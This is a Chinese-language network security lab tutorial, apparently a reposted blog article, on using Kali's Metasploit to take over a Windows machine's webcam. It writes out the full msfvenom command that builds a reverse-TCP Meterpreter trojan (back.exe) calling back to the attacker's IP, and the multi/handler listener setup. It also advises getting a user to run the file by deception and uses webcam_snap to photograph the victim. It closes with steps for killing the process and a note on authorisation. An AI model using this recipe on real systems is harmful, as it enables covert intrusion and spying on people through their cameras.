当前位置: 首页 > article >正文

计算机网络安全实验-使用Kali进行Metasploit操作宿主机摄像头的相关操作步骤

目录

一、生成Payload(木马程序)

二、设置Metasploit监听

三、将Payload传输到目标Windows系统并执行

 操作示例:

关闭在Windows中运行的 back.exe(恶意木马文件)的方法:


以下是使用Kali IP为192.168.142.132进行Metasploit相关操作的步骤:

一、生成Payload(木马程序)

在Kali终端中使用msfvenom命令生成针对Windows系统的恶意Payload,该Payload将在目标系统上运行并建立反向连接。

命令示例:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.142.132 LPORT=4444 -f exe -o back.exe

二、设置Metasploit监听

启动Metasploit控制台:输入msfconsole。

加载处理反向连接的模块:use exploit/multi/handler。

设置PAYLOAD类型:set PAYLOAD windows/meterpreter/reverse_tcp。

设置LHOST为Kali的IP地址:set LHOST 192.168.142.132。

设置LPORT为4444:set LPORT 4444。

启动监听:输入exploit。

三、将Payload传输到目标Windows系统并执行

将生成的back.exe文件传输到目标Windows系统上,并通过诱导用户执行或利用漏洞远程执行该文件。

一旦执行,目标系统将建立反向连接到Kali系统,Metasploit监听器将捕获连接,允许对目标系统进行后续操作。

 操作示例:

webcam_snap 命令控制Windows摄像头拍照

拍到的照片会传到kali上

关闭在Windows中运行的 back.exe(恶意木马文件)的方法:

使用任务管理器

  1. 原理

    • 任务管理器可以查看和管理当前在Windows系统中运行的进程。通过在任务管理器中找到并结束与 back.exe 相关的进程,可以阻止它继续运行。

  2. 步骤

    • 按下 Ctrl + Shift + Esc 组合键打开任务管理器。

    • 在 “进程” 选项卡中,查找名为 back.exe 的进程。

    • 找到 back.exe 进程后,选中它并点击 “结束任务” 按钮。

(*)在传输和诱导执行过程中,要严格遵守法律法规和道德规范。如果是进行安全测试,需要得到相关明确授权,并且要告知相关人员测试的范围和可能的影响。


http://www.kler.cn/a/412917.html

相关文章:

  • 【Jenkins】自动化部署 maven 项目笔记
  • 【Linux运维】关于Linux系统运维基本操作命令
  • Linux入门系列--用户与权限
  • 不用下载安装的线上3D编辑器,支持哪些功能?
  • NUMA架构及在极速网络IO场景下的优化实践
  • 狂野飙车8+(Asphalt 8+) for Mac 赛车竞速游戏 安装教程
  • 【代码随想录|贪心算法02】
  • 【Android】AnimationDrawable帧动画的实现
  • Java---JDBC案例--手机信息管理系统
  • 基于企业微信的问卷系统的设计与实现
  • HiISP(一)
  • 银联大数据面试题及参考答案
  • vue3总结
  • [Bash]遍历文件夹下的动态库文件,并为每个so文件创建一个软连接(symbolic link)
  • Windows修复SSL/TLS协议信息泄露漏洞(CVE-2016-2183) --亲测
  • 数据结构(Java)—— ArrayList
  • 数字图像处理(9):VGA接口及其时序
  • 使用C语言实现Linux的date>date.txt功能
  • Vue2中 vuex 的使用
  • 嵌入式硬件实战基础篇(四)多路直流稳压电源